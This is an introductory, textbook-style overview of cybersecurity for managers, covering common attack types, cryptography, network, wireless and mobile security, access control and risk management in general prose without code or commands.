SOCIAL ENGINEERING ATTACKS
While social engineering is closely related with cybersecurity today, it is not restricted to vulnerabilities of computer and network systems. Several established practices of information interception are still having value in finding important information about the target. Managers must be familiar not only with the social engineering attacks via the Internet and social media, but also with certain usual, yet logical, data theft tactics in physical conditions. Most important, managers should become competent about existing countermeasures and in what ways they should be trained to handle social engineering. While security software products can protect the institution in several ways on the network level, physical security must not be undervalued or ignored when it comes to social engineering attacks.
In the cyber field these days, malware/spyware/adware, worms, trojan horses, etc. have become ordinary in the forms of attacks. These types of threats have been here for a long time, but their level of complexity keeps growing on a virtually daily basis. Not only does it inflict serious havoc upon end users, but it causes countless problems for network security professionals. For example, the assignment is not only to determine the point of origin for these attacks, but also to find out the best way to avoid them from happening in the future and alert if they are taking place. It would be one thing if these attacks occurred occasionally, but they are continuously happening, thus increasing the ever-burdening responsibility on network security professionals.
COMMON TYPES OF CYBERATTACKS
As we know from learning history, no two battles are the same. Not only do they follow different goals, but they are also typically distinguished by an entire set of unique features and conditions. The same can be assumed about today’s cyberattacks and that is why understanding the latest exploits is essential. In this evolving environment, the requirement for skilled and knowledgeable professionals has never been more immediate. While your experience as a manager in the field is helpful, it’s likely not sufficient to prepare you for ever-changing security needs. For this, it is essential you to be able to perform threat analysis and risk mitigation based on an understanding of related policies, laws, and regulations.
Types of Common Cyberattacks:
- Man-in-the-Middle (MITM)- this type of attack secretly interferes with a direct communication between two individuals. By eavesdropping or intercepting information on an open network, a MITM attacker can collect unauthorized control over a private conversation and manipulate it to fit their needs.
- Denial of Service (DoS)- this type of exploit also focuses on online security breach, it engages an entirely different tactic. During a DOS attack, the server, system, network, or website being targeted is brought to a halt by a flood of network traffic so heavy that it becomes besieged and shuts down.
- Replay Attack- this exploit repeats or delays a valid transmission of data on a network. When data is stored without authorization and then retransmitted to deceive the receiver into acting, an attacker can steal valid login data and gain access to the network.
- Spoofing- once an attacker gains access to a network, they can continue to exploit the access by imitating another device to attack network hosts, steal information, spread malware, or bypass access controls. While there are various types of spoofing attacks, some of the more familiar ones use IP addresses to send packets around and overload targets with network traffic.
- Phishing- this attack attempts to capture data by imitating to be something it’s not. An attacker may pretend to be a reputable entity, like a friend or professional organization. Malware is used to entice the end-user to click an infected link, the phishing scam tries to deceive the end-user that the message is coming from a trusted source, like Facebook or another legitimate website.
- Brute Force- this type of attack uses trial and error to decode encrypted data. It does not use ingenious, intellectual strategies to find assets, rather it just continually tries to crack encrypted data by trying as many combinations as possible, as fast as possible.
Application and Networking-Based Attacks:
These days hackers are not just content with targeting operating systems in order to find their way into a system; most of today’s attacks are made on applications running on a victim system. These types of attacks are predominantly alarming because the hacker can target the application layer, OSI seven-layer model, which is typically loaded with sensitive resources. For the importance of the need to be aware of the potential threats posed by hackers, some of the most notorious application attacks are cross side scripting attacks, SQL injections, buffer overflow attacks and remote code execution.
This type of attack typically occurs when the hacker sends malicious code to either a different user or to the server side of the web application by executing a script on the browser. There are two ways for this attack to occur; the first type of attack is when some data is sent to a web application through an unreliable third party in the form of a web request and the second way to perform this attack is thru entering the data in the dynamic content that’s to be received by an inexperienced user who isn’t going to bother validating it.
Injections involve attacks that can be made by inserting or, as the name says, “injecting” an SQL query from the client side’s input information. When executed, these attacks permit the hacker to read private information from the database or even make changes by using the insert, update, or delete commands. Furthermore, experienced persons of this type of attack can even make an extra effort to shut the whole DBMS down or make the host OS do things in extreme circumstances. There are a variety of known injection attacks but the two most common are:
- Command Injections: the adding of an SQL query in place of an input value in a field. Now instead of getting information relating to a normal user input, what happens is that the query runs on the server side and returns the result set for the hacker to take advantage of.
- Numeric Parameter Attack: Numeric parameters are susceptible to SQL injections because inadequately typed languages like PHP do not force variables to retain their initial data type. As a result, it is achievable to insert a crafted SQL statement in any vulnerable parameter to make a SQL injection attack. After verifying the expected data type, the attack can be performed in a similar way it would have been with a vulnerable string parameter.
BROKEN AUTHENTICATION & SESSION MANAGEMENT
Authentication and session management encompasses giving users limited levels of access to data and managing sessions. Even though the importance of authentication can never be understated, incorrect credential management can cause flawless authenticated sessions to fail. These types of attacks typically occur when the server side fails to manage the sessions intelligently. For example, a user might have logged out from the website but, because his session was not terminated at logout, a hacker was capable to send in a faulty “change password” request.
BUFFER OVERFLOW ATTACKS
Buffer overflow attacks happen when memory fragments of a process are overwritten by a hacker. An example is overwriting values of important registers like the instruction pointer (IP) or the base pointer (BP); as a result, the operating system begins reporting segmentation faults and exceptions, out of nowhere. Buffer overflow attacks can occur because of stack overflow or heap overflow.
Host, Application, and Data Security
The network should be protected by many different layers of security to protect from unwanted intrusions. Generally, user machines within the network should protected from intrusion from outside hosts by our firewall, which limits access to these machines. Nevertheless, a good security model requires the support of all those who are affected by it. Therefore, it is important that even users’ personal machines are secure. This is particularly important for clients who connect to the organization’s network from outside, on networks not controlled by the organization, either via a VPN connection or any other means. Completely securing the organization’s network means securing these hosts as well.
SECURING THE HOST
Security in host-based computing continues to be a field of consistent research. Obstacles in host-based security exist in three principal areas: application protection, host environment protection, and data protection. These three topics reiterate the security issues for mobile agents: protecting agents from hostile hosts, protecting hosts from agents, and protecting data in transit as identified. A parallel can be drawn between mobile agents and host-based applications considering both perform host-based computations.
Firewalls are required to protect the host, while the operating system and all necessary patches should be kept up to date if the plan is to have the host connected to a network during installation. The majority of the operating systems are vulnerable to compromise when they are installed, and require many patches and updates before they can safely be allowed on the network. If a host is connected to a department network without direct protection, although the department has a firewall which protects the general network from outside problems, the host can still be vulnerable to another machine on the department network while it is being installed and configured.
A software “vulnerability” is an error or vulnerability in the application that leashes it to process important data in an insecure way. By taking advantage of these “holes” in applications, hackers can gain access to an organization’s systems and steal confidential data. And practically every application has vulnerabilities. Commercial software, financial services software, software written by government agencies, each are vulnerable.
Before tools and technologies are used to address application security, a successful solution should start with a strong strategy. With an elevated concentration, the strategy should address, and constantly improve, these key steps: identification of vulnerabilities, assessment of risk, fixing errors, learning from mistakes and improve managing upcoming development processes.
The end result for the organization should be a technologically advanced application security procedure that:
- Evaluates every application, whether built in-house, purchased or compiled
- Permits developers to find and fix vulnerabilities as they are coding
- Takes advantage of cloud-based services to more easily incorporate security into the development process and scale the program
The first phase in protecting data security is to identify the types of information that needs to be protected and where that information is exposed in the organization. Once the audit is completed, the organization’s priority data needs to be identified to determine the level of risk if the data is lost. The next phase is to assess the applications and know what areas of the application are leaving the organization vulnerable to external attacks.
The success of data security, data privacy and data protection centers on:
- Accuracy of data loss prevention content analysis engines.
- Scalability of data security solutions.
- Method of the data security policy definition and process management capabilities.
- Developing clear data security strategies with specific requirements before evaluating products.
- Realizing the limitations of traditional data privacy protection and data security.
- Using application security testing as a way of protecting data.
Highly valued information must be protected completely, a second level of protection as well being used, which is encryption. Encryption can be accomplished thru cryptography, the science of converting information into a secure method so that unauthorized individuals cannot access it. Cryptography protects the confidentiality of information by ensuring that only authorized individuals can access it, protect the integrity of information, and help guarantee the availability of the data so that authorized users who possess the key can access it. Cryptography can apply nonrepudiation which stops an individual from fraudulently “reneging” on an action. The authentication of the sender can be verified through cryptography. To protect data, there are three common types of encryption algorithms: hashing, symmetric encryption, and asymmetric encryption.
In symmetric encryption, the sender and receiver use a separate request of the same “key” to encrypt and decrypt messages. Symmetric encryption greatly depends on the fact that the keys are “required” to be kept secret. Distributing the key in a secure method is one of the major challenges of symmetric encryption. Symmetric cryptography can provide strong protections against attacks if the key is kept secure.
Asymmetric encryption is when the sender and the receiver use different “keys” to encrypt and decrypt messages. At this point a public key is used to encrypt the message, and a private key is used to decrypt the message. symmetric cryptography upholds the security tenets of authenticity and non-repudiation. Once one encrypts a message with a private key and sends it, authenticity is established. Likewise, non-repudiation is determined when a message is encrypted with a private key. Cryptography plays a crucial role in encrypting modern day applications such as Digital signatures and HTTPS. Cryptography continues to play a very important and crucial role in securing every aspect of digital communication.
The general basic type of cryptographic algorithm is a one-way hash algorithm. A hash algorithm creates a unique “digital fingerprint” of a set of data and is usually called hashing. This fingerprint, called a message digest or hash, represents the data. While hashing is regarded a cryptographic algorithm, its goal is not to create ciphertext that can later be decrypted. Rather, hashing is “one-way” in that its contents cannot be used to disclose the original set of data. Hashing is used mainly for comparison purposes.
A popular application of cryptography is digital certificates. Utilizing digital certificates includes knowing their purpose, understanding how they are managed, and defining which type of digital certificate is suitable for different situations. A digital certificate is a technology used to associate a user’s identity to a public key and that has been “digitally signed” by a trusted third party. The third party confirms the owner and that the public key belongs to that owner. These digital certificates are essentially a container for the public keys. Yet, certificates also can contain other user-supplied information, such as basic registration information, postal address, email and, such as the country or region, age, and user’s gender. Digital certificates can also be used to identify objects such as servers and applications.
A practical application of cryptography is Digital signatures which are signatures that are applied digitally. They enforce the goals of authentication, non-repudiation, and confidentiality. With business transactions occurring all around the world frequently, manually signing a document and transferring it to different locations is time-consuming. By digitally signing the documents, the business transaction can be completed in a timely manner. Also, when two parties are required to sign documents relating to a business transaction that may never met each other the Digital signatures ensure timeliness and authenticity of business transactions.
Hypertext transfer protocol, HTTP, is a protocol that makes it possible for communicating on the Internet. It is the essential part of the World Wide Web. HTTP is a stateless protocol while the server does not remember the client once the transaction is over. HTTPS is HTTP running on top of SSL (Secure Sockets Layer). Many of the everyday transactions are done online results in important data like credit card numbers and bank account numbers being transmitted online. This critical data must not fall into the criminal hands which may be used for illegal purposes. This demands a necessity that the communication between the server and client be secure. SSL ensures this secure channel of communication using cryptography. Most users are confident of the SSL security by seeing the “padlock” on the left part of the address bar along with the “https” instead of “http.”
Network Security Fundamentals
There are three fundamental methods used to achieve a network security. Typically, organizations utilize some combination of the three approaches to achieve security. The three methods are security by obscurity, the perimeter defense model, and the defense in depth model.
Security by Obscurity
Security by obscurity depend on stealth for protection. The thought behind this ideal is that if no one knows that a network or system is around, then it won’t be expose to attack. The essential plan is to hide the network or at least not advertising its existence will provide adequate security. The problem with this method is that it never works in the extended period, and once discovered, a network is completely exposed.
The Perimeter Defense
The perimeter defense model is comparable to a castle surrounded by a moat. When using this method in network security, organizations strengthen perimeter systems and border routers, or an organization might “hide” its network behind a firewall that separates the protected network from an untrusted network. Very little is done to secure the other systems on the network. The concept is that perimeter defenses are adequate to prevent block any intruders so that the internal systems will be secure.
There are quite a few defects in this method: First, this method does nothing to defend internal systems from an internal attack. As mentioned, most of attacks on company networks are launched from internal personal to the organization. Second, the perimeter security nearly always fails eventually. Once it does, the internal systems are left exposed to an attack.
The Defense in Depth
The strongest method to use is the defense in depth model. The defense in depth method strives for security by strengthening and monitoring each system; each system defends itself. Extra procedures are still taken on the perimeter systems, but the security of the internal network does not rely exclusively on the perimeter systems. This method is harder to accomplish and requires that all systems and network administrators do their share. However, with the defense in depth model the internal network is much less likely to be compromised if a system administrator on the network makes an error like putting an unsecured modem on the system. With the defense in depth approach, if the system with the modem is compromised, other systems on the network will be able to secure themselves. The other systems on the network should also be able to notice any attempted attacks from the compromised system. This approach also provides more protection against an internal attacker. The activities of the internal attacker are more likely to be detected.
Administering a Secure Network
Administering a secure network require more than installing security updates and monitoring for intrusions. It also involves making reasonable decisions regarding security. But sometimes security decisions are anything but reasonable. A network that is not properly maintained through proven administrative procedures is vulnerable to attackers. Administering a secure network requires common network protocols, which are important to use in maintaining a secure network. Next, issuing basic network administration principles. Lastly, securing three general types of network applications: IP telephony, virtualization, and cloud computing.
Common Network Protocols
The computer networks protocols, rules for communication, are essential for proper communication to take place between network devices. The generally common protocol used today for both local area networks (LANs) and the Internet is Transmission Control Protocol/Internet Protocol (TCP/IP). TCP/IP is not just a single protocol, but it contains four protocols that all function together (called a protocol suite). The two key protocols that make up its name, TCP and IP, are deemed the most important protocols. IP is the protocol that functions primarily at the Open Systems Interconnection (OSI) Network Layer (Layer 3) to deliver addressing and routing. TCP is the main Transport Layer (Layer 4) protocol that is responsible for creating connections and the reliable data transport between devices. The four layers of the TCP/IP model are: Application, Transport, Internet, and Network Interface. The essential TCP/IP protocols that are associated with security are Internet Control Message Protocol (ICMP), Simple Network Management Protocol (SNMP), Domain Name System (DNS), file transfer and storage protocols, NetBIOS, and Telnet.
Network Administration Principles
Administering a secure network can be a difficult and challenging task. It is imperative that network security administration follow a rule-based management process of administration that relies on following technical and procedural rules, rather than creating security fundamentals that develop apathetically. There are different types of Procedural rules may that be classified as the authoritative and prescribed guidance for conduct. For data security, procedural rules can be external to the organization, such as the Health Insurance Portability and Accountability Act of 1996, the Sarbanes-Oxley Act of 2002, or the Gramm-Leach-Bliley Act or internal. The procedural rules in turn, influence technical rules which may encompass configuring a firewall or proxy server to follow to the procedural rules.
Securing Network Applications
IP telephony, virtualization, and cloud computing are quite new network applications and platforms that call for special security concerns. The most evident of these integration efforts are the convergence of voice and data traffic over a single Internet Protocol (IP) network.
- IP telephony uses a databased IP network to combine digital voice clients and new voice applications onto the IP network. Constructing a combined network of voice, video, and data traffic may improve security because only one network must be managed and protected. Nevertheless, IP telephony networks are not exempt to attack. Because they use IP networks, they may be susceptible to attackers.
- Virtualization is a means of displaying and managing computer resources by function without considering to their physical layout or location. Virtualization is used considerably to consolidate network and web servers so that several virtual servers can run on a single physical computer. Because a normal server operates at only about 10 percent of its capacity, there is additional capacity for running virtual machines on a physical server. Virtual machines must be secure from both external networks and other virtual machines on the same physical computer. In a network without virtual machines, external devices such as firewalls and IDS that exist in between physical servers can help stop one physical server from infecting another physical server, however no such physical devices are between virtual machines.
- Cloud computing, which customers pay only for the online computing resources they need, has emerged as an innovative idea that significantly impact all areas of IT, with network design, applications, procedures, and even personnel. In spite of its impact on IT, cloud computing presents important security concerns. It is imperative that the cloud provider ensure that the means are in place by which only authorized users are given access while attackers are blocked. Also, all transmissions to and from “the cloud” must be satisfactorily secure. Lastly, the customer’s information must be properly separated from that of other customers, and the highest level of application accessibility and security must be provided.
WIRELESS NETWORK SECURITY
Wi-Fi signals are not limited by walls or doors, the user has exceptional mobility and can freely travel while still connected to the network. However, this feature is also a security problem. Because a wireless signal is not restricted within the walls of a building, an unauthorized user can pick up the signal outside a building’s security perimeter. for example, a hacker waiting in the parking lot with a wireless laptop, could connect to the wireless signals. This would permit a hacker to infect the network with malware, or eavesdrop on the wireless communications to read everything that is being transmitted.
There are three common attacks that can be guided targeted against wireless data systems. These attacks can be targeted against Bluetooth systems, near field communication devices, and wireless local area networks.
- Bluejacking and bluesnarfing are two Bluetooth attacks. Bluejacking is an attack that sends unwanted messages to Bluetooth-enabled devices. Also images and sounds also can be transmitted. Bluesnarfing is an attack that accesses unauthorized data from a wireless device through a Bluetooth connection, frequently between cell phones and laptop computers.
- Near field communication (NFC) devices have risks because of the nature of this type of technology. The NFC communication between device and terminal can be intercepted and viewed because an attacker can be close enough to pick up the signal, users must be alert. Its required that NFC applications carry out encryption on communication.
- Different wireless attacks can be targeted at the enterprise. These attacks include rogue access points (AP), evil twins, intercepting wireless data, wireless replay attacks, and wireless denial of service attacks. Attackers can then get around the security protections of the company’s network. The most common wireless attacks are intercepting and reading data, known as packet sniffing, being transmitted. An attacker can intercept the RF signal from an open or misconfigured AP and read any confidential wireless communications. To make matters worse, if the attacker manages to connect to the enterprise wired network through a rogue AP, they could also examine the transmission and multicast wired network traffic that leaks to the wireless network.
VULNERABILITIES OF IEEE WIRELESS SECURITY
Wired Equivalent Privacy (WEP) is an IEEE 802.11 security protocol created to ensure that only authorized persons can view transmitted wireless information. WEP has several security vulnerabilities. WEP can use only a 64-bit or 128-bit number for encryption, which is made up of a 24-bit IV and either a 40-bit or 104-bit default key. At the same time if a longer 128-bit number is used, the length of the IV remains at 24 bits. The rather short length of the IV reduces its strength, since shorter keys are simpler to break than longer keys. An attacker who intercepts packets for this length of time can view the duplication and use it to crack the code.
Wi-Fi Protected Setup (WPS) is a voluntary means of setting up security on wireless local area networks. WPS methods utilizes a Personal Identification Number (PIN) of the wireless router or displayed through a software setup wizard and the push-button method: the user pushes buttons and the security configuration take place. An attacker can crack the PIN within than four hours and become connected to the WLAN. This defeat security restrictions concerning permitting only authorized users to connect to the wireless network. Although an advancement over WEP, WPA nevertheless has weaknesses.
Wi-Fi Protected Access 2 (WPA2), is the second initiation of WPA security. WPA2 is built on the final IEEE 802.11i standard and is almost identical to it. The distinction between WPA2 and IEEE 802.11i is that WPA2 permits wireless clients using Temporal Key Integrity Protocol (TKIP) to function in the same WLAN, whereas IEEE 802.11i does not permit them to do so. The encryption protocol used for WPA2 is the Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP) and requires the use of CCM (a general-purpose cipher mode algorithm providing data privacy), which is the most secure cipher AES that is mandated by the WPA2 standard.
WLAN uses the Service Set Identifier (SSID) of the wireless network. The SSID serves as the user-supplied network name of a wireless network and usually can be any alphanumeric string up to 32 characters. Although normally the SSID is broadcast so that any device can discovered it, the broadcast can be restricted. Then only those users that are aware of the “secret” SSID beforehand would be able to access the network. While this may seem to offer security by not advertising the SSID, it provides only a weak degree of protection and can be easily discovered even when it is not limited in beacon frames because it is transmitted in other management frames sent by the AP. Attackers with protocol analyzers can still identify the SSID.
MOBILE DEVICE SECURITY
There are various types of mobile devices. Portable computers, laptops, and notebooks computer are designed to include only the most basic frequently used features of a standard computer in a smaller size that is easy to carry. Tablets and smartphone includes an operating system that allows it to run apps and access the Internet, and it offers a broader range of functionality. Mobile devices utilize flash memory for storage. All mobile devices have local non-removable storage capacities, plus most devices support removable data storage.
RISKS ASSOCIATED WITH MOBILE DEVICES
Mobile devices are utilized in various of locations that are outside of the business’s normal physical perimeter. Numerous risks are related with using mobile devices. These devices must access public external networks for their Internet connection. Because these networks are beyond the control of the business, attackers can eavesdrop on all communications and view sensitive data. Mobile devices with GPS capabilities can track the location of a person carrying a mobile device. This could place the user in danger of a directed physical attack. Mobile devices are designed to easily acquire and install apps from a range of resources. In some instances, security features may not be contained within in these apps. The two dominant operating systems for mobile devices are Apple iOS and Google Android, which have very different operating systems and different levels of security. Mobile devices can gain access to untrusted apps that other types of computing devices usually do not have.
SECURE A MOBILE DEVICE
Quite a few configurations need to be considered when a mobile device initially set up. It is best to disable unused features, turn off those that do not provide business use of the device and that are seldom used. A lock screen stops the mobile device from being used until the correct passcode is entered. Some mobile devices can be configured that after a limited number of failed attempts to enter the correct passcode, for example when trying to guess the code, extra security protections will active. Mobile devices that store sensitive data must have that data encrypted to protect it. A key to securing mobile devices is to control access to the device and its data by restricting who is authorized to access the data. At the business level, decisions must be made about who can gain access to the data prior to downloading it onto a mobile device.
MOBILE DEVICE APP SECURITY
Mobile device apps must be secured. MDM (Mobile Device Management) can provide application whitelisting, which confirms that only preapproved apps can be run on the device. Also, MDMs can enforce geo-fencing which utilizes the device’s GPS to define geographical boundaries where the app can function. MDM tools permit a device to be managed remotely. In general, MDM involves a server component, which sends out management commands to the mobile devices, and a client component, which runs on the mobile device to receive and implement the management commands. If a mobile device is lost or stolen, various security features can be activated to locate the device and reduce the damage. Many of these can be accessed through either MDM, a feature in the operating systems, or an installed third-party app. But if the device cannot be located, a remote wiping should be executed, which will erase sensitive information kept on the mobile device.
ACCESS CONTROL FUNDAMENTALS
The process by which access to resources or services are denied or granted is Access Control. Physical access control involves protections to limit access to devices, whereas technical access control is the technology limitations that regulate users on computers from accessing data. Hardware and software have an established framework that the administrator can use for controlling access, known as an access control model. The four major access control models are:
- The Discretionary Access Control model, gives the user full control over any objects that they own.
- Mandatory Access Control model, the end-user cannot modify any security settings.
- Role Based Access Control, outlines the user’s job function with security settings.
- Rule Based Access Control, dynamically assigns roles based on a set of rules.
IMPLEMENT ACCESS CONTROL
Implementing access control methods include using access control lists (ACLs), which are requirements attached to an object. ACLs describe which employees can access which objects and specify which operations they can perform. Group Policy, a Microsoft Windows feature, provides centralized management and the configuration of computers that use Active Directory. Time of day restrictions regulate when a user can log into a system and access resources. Account expiration details when a user’s account expires.
BEST PRACTICES FOR IMPLEMENTING ACCESS CONTROL:
- Separation of Duties – dividing a process between two or more individuals
- Job Rotation – periodically moving workers from one job responsibility to another
- Using the Principle of Least Privilege – giving users only the minimal amount of privileges necessary to perform their job functions
- Using Implicit Deny – rejecting access unless it is specifically granted
- Mandatory Vacations – requiring that employees take periodic vacations
TYPES OF AUTHENTICATION SERVICES
Authentication services can be provided on a network by a dedicated authentication, authorization, and accounting (AAA) server or by an authentication server, which is a server that performs only authentication.
- RADIUS, or Remote Authentication Dial in User Service, the industry standard with support across virtually all vendors of networking hardware. The benefit of RADIUS is that messages are never directly sent between the wireless device and the RADIUS server. This averts an attacker from penetrating the RADIUS server and breaching security.
- Kerberos is an authentication system used to authenticate the identity of users on the network. Like RADIUS, Terminal Access Control Access Control System (TACACS), XTACACS, and TACACS+ are protocol specifications that forward user name and password information to a centralized server.
A directory service, a database that’s stored on the network, holds data about users and network devices including all the resources on the network and a user’s privileges to access those resources. A directory service can grant or deny access based on the information. One application of a directory service as an authentication is the Lightweight Directory Access Protocol (LDAP). Security Assertion Markup Language (SAML) is an XML standard that permits secure web domains to transmit user authentication and authorization data with each other.
Risks can be placed into a few categories, such as managerial, operational, financial, compliance, environmental, technical, and strategic. There are various approaches for controlling risk:
- Modify the Response to The Risk
- Use the Simple Risk Model
- Reduce the Impact of Risk Using Types of Risk Control
- Mitigate Risk from A Managerial Perspective
Privilege management includes the procedures of managing object authorizations. One element of privilege management involves periodic review of a user’s privileges over an object is consider privilege auditing by assigning and revoking privileges to objects.
Change management engages the practice for making changes and keeping track of those changes. Without proper documentation in procedures, a change may undo, counteract a previous change or even mistakenly cause a security vulnerability. Change management strives to manage changes systematically and provide the crucial documentation of the changes.
Incident management is the framework and functions necessary to allow incident response and incident handling within the business. The goal of incident management is to restore the normal operations as soon as possible with the least possible impact on the business.
HOW TO CONTROL RISK
An important question is the impact or seriousness of a risk and how to reduce it? Various methods are available to reduce risk. One method is to change the response to the risk rather than accepting the risk. The three responses to risk are:
- Risk Transference – a third party responsible for the risk.
- Risk avoidance – identifying the risk and making the decision to not engage in the activity.
- Risk Mitigation – the attempt to address the risk by making it less serious.
Another method is the Simple Risk Model, where preventive elements are considered the most effective in reducing risk, given that they minimize the possibility of loss by avoiding the risk from occurring, and therefore should be used. The basics of Simple Risk Model:
- Preventive – controls used to prevent the loss or harm from occurring based on the risk
- Detective – controls used to monitor activity to identify instances where practices or procedures were not followed
- Corrective – controls used to restore the system back to its prior state before a malicious event occurred
SECURITY POLICIES CAN REDUCE RISK
A security policy defines the protections that must be authorized to ensure that the business’s assets encounter minimal risks. A security policy, combined with the associated procedures, standards, and guidelines, is crucial to implementing information security in a business. Maintaining a written security policy allows a business to take appropriate action to protect its data. Security policy provides various functions:
- It can server as a formally expression of the management’s overall intention and direction.
- Security policy servers as communication of information security culture and acceptable information security behavior.
- It describes specific risks and provides directions that management can use to monitor employee behavior.
- It can generate a security-aware office culture.
- It can make sure that employee behavior is focused and supervised in compliance with security requirements.
AWARENESS & TRAINING INCREASES SECURITY
User awareness is a critical component of security. Awareness and training includes instruction regarding compliance, secure user practices, and an awareness of threats. An important part of information security is to make available security awareness and training to users. All computer users in the organization have a joint responsibility to protect the assets of the business. It should not be expected that all users have the understanding and skill to protect the assets of the business. Rather, users require training in the importance of securing information, the functions that they contribute to security, and the steps required to prevent attacks. user awareness and training must be ongoing because new attacks appear regularly, and new security vulnerabilities are continuously being exposed. There are techniques that should be take into consideration to make the training informative and useful.
All employees require continuous training in the new security defenses and to be reminded of company security policies and procedures. Reasons for security education and training:
- New Employee Is Hired
- Computer Attack Has Occurred
- Employee Is Promoted or Given New Responsibilities
- During Yearly Departmental Leave
- New Software Is Installed
- Hardware Is Upgraded
Vulnerability assessment is a careful and systematic assessment of the exposure of assets to attackers, forces of nature, and any other entity that could cause possible harm. Vulnerability assessment tries to detect what asset needs to be protected, what the threat are against those assets, how vulnerable the current protection is, and what risk could result from the threats. Once finalized, risk mitigation can take place.
VULNERABILITY ASSESSMENT IS IMPORTANT
Because successful attacks are expected, organizations must protect their businesses by reasonably assessing their vulnerabilities, evaluating how an attacker could penetrate their security, and then take preventive measures to defend against those attacks.
Practically all security experts express that it’s not a matter of if an attack will penetrate security, but only a matter of when. The purchasing expensive security devices, installing the latest antimalware software, conducting employee training sessions, and hiring a staff of security technicians produces a false sense of security and protection. While each of these defenses is vital, they are of limited value unless they are correctly applied. Security hardware and software must be properly installed, configured, and maintained. Employee training must be ongoing with a feedback system that determines its effectiveness. Security technicians require constant training on the latest attacks and security. Simply having the right security applications does not promise a secure system.
VULNERABILITY SCANNING AND PENETRATION TESTING
Vulnerability scan exams a system for any known security vulnerabilities and generates a report of those possible exposures. It assesses the current security in a passive process and does not attempt to exploit any vulnerabilities it discovers. Vulnerability scans are typically performed from within the security perimeter and are not intended to interrupt the normal processes of the network and devices. These scans are conducted using an automated software package that assesses the system for known vulnerabilities by passively analyzing the security controls. Penetration testing is designed to exploit any vulnerabilities exposed in systems. Penetration testers do not utilize automated software as with vulnerability scanning. Testers are typically external to the security perimeter and may even interrupt the operation of the network and devices instead of passively searching for a known vulnerability.
MITIGATING AND DETERRING ATTACKS
Various standard techniques can be applied in mitigating and deterring attacks. A security posture is an attitude about security. A strong security posture stems from a sound and effective approach toward managing risks. Crucial to mitigating and deterring attacks is the range of appropriate controls and the correct configuration of those controls. One group of controls are those that can either detect attacks and prevent attacks. The reason of hardening is to remove as many security risks as possible and make the system more secure. Reporting can offer information regarding the events that happen so that action can be taken. Reporting also can include providing information on trends that may reveal an even more serious threatening situation.